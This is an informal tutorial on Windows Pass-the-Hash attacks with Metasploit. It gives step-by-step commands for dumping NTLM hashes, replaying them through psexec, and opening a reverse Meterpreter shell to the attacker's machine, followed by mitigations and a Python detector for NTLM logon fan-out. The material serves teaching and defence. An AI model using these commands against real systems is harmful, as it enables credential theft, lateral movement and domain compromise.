Pass-the-Hash (PtH) Attack — MSF Edition (Target: Windows)
Alright, buckle up. Let’s talk about Pass-the-Hash, the ultimate Windows party trick where hackers skip the password nonsense and just slap the hash on the table to get in.
WTF is Pass-the-Hash?
Pass-the-Hash (PtH) lets attackers authenticate to Windows systems using NTLM hashes instead of plaintext passwords. Windows accepts these hashes because… well, legacy stuff and enterprise backwards compatibility. Thanks, Microsoft.
- No password cracking needed.
- Super popular for lateral movement.
- Still works way too often in 2025.
Attack Scenario
So let’s say you’ve popped a Windows machine (e.g. via EternalBlue, phishing, or magic). Your goal: pivot to another Windows target using the stolen hashes.
Step 1 — Dump Hashes from Windows
You’ve already got a Meterpreter session on your first compromised Windows box. Time to grab the hashes.
Dumping with Meterpreter:
meterpreter > hashdump
Example output:
Administrator:500:aad3b435b51404eeaad3b435b51404ee:88aad3b435b51404ee3c234c30e3e84d:::
bob:1001:aad3b435b51404eeaad3b435b51404ee:f8f7e33a9b35e6ab5f5acabc1e34567d:::
The last chunk is the NTLM hash you’re after.
Step 2 — Fire Up Metasploit for PtH
Now you want to authenticate to another Windows target (say, 10.10.10.20) using the hash you stole.
Metasploit’s psexec exploit is your friend. It lets you connect to a Windows box via SMB and execute commands — all using the hash instead of the password.
Example MSF Commands
Start by loading the module:
use exploit/windows/smb/psexec
Then set your options:
set RHOSTS 10.10.10.20
set SMBUser Administrator
set SMBDomain WORKGROUP
set SMBPass aad3b435b51404eeaad3b435b51404ee:88aad3b435b51404ee3c234c30e3e84d
set PAYLOAD windows/x64/meterpreter/reverse_tcp
set LHOST <your_IP>
run
Note:
- The SMBPass value uses the format LM:NTLM (the LM hash, a colon, then the NTLM hash).
- If you don’t have an LM hash, repeat the NTLM hash in both fields. E.g.:
set SMBPass 88aad3b435b51404ee3c234c30e3e84d:88aad3b435b51404ee3c234c30e3e84d
Step 3 — Get Your Shell
If it works, you’ll see:
[*] Started reverse TCP handler on x.x.x.x:4444
[*] Service started successfully...
[*] Meterpreter session 2 opened
Congrats. You’re now SYSTEM on the second Windows box: no password cracking, just pure hash power.
Risks
- Massive Lateral Movement: Attackers can hop across Windows machines like they’re playing hopscotch.
- Domain Compromise: One hash can lead to domain admin takeover.
- Detection is Tricky: Looks like normal SMB traffic if you’re not paying attention.
How Not to Get Owned
- Use LAPS so every Windows machine has a unique local admin password.
- Deploy Windows Defender Credential Guard where possible.
- Keep privileged accounts off regular workstations.
- Monitor SMB and NTLM auth logs for weird patterns.
- Restrict lateral movement via network segmentation.
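To make the "monitor SMB and NTLM auth logs" bullet concrete, here is an added detection example (not part of the original post): it scans Security event 4624 records for the footprint a psexec-style hash replay leaves behind, one account from one source IP logging on over NTLM (network logon, type 3) to several hosts within a few minutes. The field names are the real 4624 fields; the sample log lines, hostnames and IP addresses are constructed for the example.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample lines (not real logs). Fields are from Security event 4624:
# time|EventID|Computer|TargetUserName|TargetDomainName|LogonType|AuthenticationPackageName|IpAddress
SAMPLE_LOG = """\
2025-03-01T10:00:01|4624|WS01|alice|CORP|2|Kerberos|-
2025-03-01T10:01:10|4624|WS02|alice|CORP|3|Kerberos|10.10.10.5
2025-03-01T10:02:00|4624|SRV01|Administrator|SRV01|3|NTLM|10.10.10.10
2025-03-01T10:02:05|4624|SRV02|Administrator|SRV02|3|NTLM|10.10.10.10
2025-03-01T10:02:11|4624|SRV03|Administrator|SRV03|3|NTLM|10.10.10.10
2025-03-01T10:02:20|4624|SRV04|Administrator|SRV04|3|NTLM|10.10.10.10
2025-03-01T14:30:00|4624|FS01|svc_backup|CORP|3|NTLM|10.10.10.50
"""
FIELDS = ["time", "event_id", "computer", "user", "domain",
          "logon_type", "auth_package", "src_ip"]

def parse_events(text):
    """Turn the pipe-delimited lines into dicts with a parsed timestamp."""
    events = []
    for line in filter(None, text.splitlines()):
        ev = dict(zip(FIELDS, line.split("|")))
        ev["time"] = datetime.fromisoformat(ev["time"])
        events.append(ev)
    return events

def find_pth_fanout(events, window=timedelta(minutes=5), min_hosts=3):
    """Return {(user, src_ip): info} for actors whose NTLM network logons
    (4624, LogonType 3) reach >= min_hosts distinct hosts within `window`.
    Interactive and Kerberos logons are skipped: a replayed hash over SMB
    arrives as a type-3 logon with AuthenticationPackageName = NTLM."""
    by_actor = defaultdict(list)
    for ev in events:
        if (ev["event_id"], ev["logon_type"], ev["auth_package"]) == ("4624", "3", "NTLM"):
            by_actor[(ev["user"], ev["src_ip"])].append(ev)
    alerts = {}
    for actor, evs in by_actor.items():
        evs.sort(key=lambda e: e["time"])
        for i, first in enumerate(evs):
            hosts = {e["computer"] for e in evs[i:] if e["time"] - first["time"] <= window}
            if len(hosts) >= min_hosts:
                alerts[actor] = {
                    "hosts": sorted(hosts),
                    # TargetDomainName == Computer means a *local* account, i.e.
                    # the same local Administrator hash reused across machines
                    "local_account": all(e["domain"] == e["computer"] for e in evs),
                }
                break
    return alerts
```

The `local_account` flag is the LAPS point from the list above: a local Administrator hash that opens four servers in twenty seconds is exactly what unique per-machine passwords prevent. Tune `window` and `min_hosts` to your environment, since legitimate management tooling can also fan out over NTLM.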
Side note: Even in 2025, PtH works because old Windows protocols die hard. Don’t underestimate how many networks still leave this door wide open.